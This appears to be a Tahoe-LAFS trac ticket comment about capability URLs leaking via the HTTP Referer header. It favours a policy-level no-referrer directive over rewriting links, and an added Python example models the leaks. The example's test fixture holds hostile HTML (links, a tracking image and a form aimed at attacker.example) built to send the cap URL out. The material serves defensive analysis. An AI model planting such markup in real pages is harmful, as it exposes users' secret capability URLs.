[tahoe-lafs-trac-stream] [tahoe-lafs] #127: Cap URLs leaked via HTTP Referer header
tahoe-lafs
trac at tahoe-lafs.org
Mon Oct 29 17:49:53 UTC 2012
#127: Cap URLs leaked via HTTP Referer header
-------------------------+-------------------------------------------------
Reporter: warner | Owner: davidsarah
Type: defect | Status: assigned
Priority: major | Milestone: 1.11.0
Component: code-frontend-web | Version: 0.7.0
Resolution: | Keywords: confidentiality integrity preservation capleak
Launchpad Bug: |
-------------------------+-------------------------------------------------
Comment (by davidsarah):
Replying to [comment:32 ChosenOne]:
> The noreferrer attribute on links could prevent leaking dircaps when
> clicking the link to a potentially malicious html file on the WUI
> http://www.whatwg.org/specs/web-apps/current-work/multipage/links.html#link-type-noreferrer
[attachment:restrict-referrer-leakage.txt] is a more complete and simpler
solution, as the spec says:
> The effect of this directive with an empty set of allowed referrer
> recipients includes the effect of treating all links from the affected
> documents as having the _noreferrer link type_ [HTML5]. However, this
> directive:
> * applies to all requests, rather than only to requests made as a result
>   of following links defined by an HTML 'a' or 'area' element;
> * does not require rewriting links to have the noreferrer type;
> * enables the set of allowed referrer recipients to be controlled,
>   subject to any other user-agent-dependent restrictions as mentioned above;
> * is resistant to content injection attacks (at least in the case where
>   the Content-Security-Policy is specified by HTTP header).
(We don't need the third point but the other three are important, because
rewriting is hard.)
--
Ticket URL: <https://tahoe-lafs.org/trac/tahoe-lafs/ticket/127#comment:35>
tahoe-lafs <https://tahoe-lafs.org>
secure decentralized storage
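The distinction the comment above draws (a response-level policy covers every request the page causes, while per-link rewriting covers only anchors) as an added example that is not part of the ticket or of Tahoe-LAFS: a small Python model of which outbound requests from a hostile HTML file stored in a Tahoe directory would carry the cap URL in the Referer header. The names `referrer_leaks` and `_RequestCollector`, the sample HTML and the cap URL are constructed for the example; the header case is modelled on the later standardized `Referrer-Policy: no-referrer`, not on the attachment's directive itself.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Elements whose URL attribute makes the browser issue a request that
# carries a Referer header (a representative subset, not an exhaustive list).
URL_ATTRS = {"a": "href", "img": "src", "script": "src",
             "iframe": "src", "form": "action", "link": "href"}


class _RequestCollector(HTMLParser):
    """Collect (tag, url, has_noreferrer) for every request-issuing element."""

    def __init__(self):
        super().__init__()
        self.requests = []

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        attr = URL_ATTRS.get(tag)
        if attr and attrs.get(attr):
            rel = (attrs.get("rel") or "").lower().split()
            self.requests.append((tag, attrs[attr], "noreferrer" in rel))


def referrer_leaks(html, page_url, header_no_referrer=False):
    """Return the off-gateway URLs that would receive page_url (the cap URL)
    as Referer. header_no_referrer=True models a gateway response header
    that forbids all referrer recipients (the directive quoted in the ticket;
    the standardized equivalent today is 'Referrer-Policy: no-referrer').
    Without it only <a rel="noreferrer"> links are protected, i.e. the
    per-link rewriting the ticket argues is insufficient."""
    collector = _RequestCollector()
    collector.feed(html)
    leaks = []
    for tag, url, noreferrer in collector.requests:
        target = urljoin(page_url, url)
        if urlsplit(target).netloc == urlsplit(page_url).netloc:
            continue  # request stays inside the gateway: no leak
        if header_no_referrer or (tag == "a" and noreferrer):
            continue
        leaks.append(target)
    return leaks


# Constructed sample: a hostile HTML file served from a placeholder dircap.
# The rel="noreferrer" anchor stands in for a link the WUI rewrote.
CAP_URL = "http://127.0.0.1:3456/uri/URI%3ADIR2%3APLACEHOLDER/evil.html"
EVIL_HTML = """<html><body>
<a href="http://attacker.example/link" rel="noreferrer">rewritten link</a>
<a href="http://attacker.example/plain">plain link</a>
<img src="http://attacker.example/pixel.gif">
<form action="http://attacker.example/post"><input type="submit"></form>
<script src="/static/local.js"></script>
</body></html>"""
```

Run with only the rewritten anchor protected, `referrer_leaks(EVIL_HTML, CAP_URL)` still reports the plain link, the image and the form; with `header_no_referrer=True` it reports nothing.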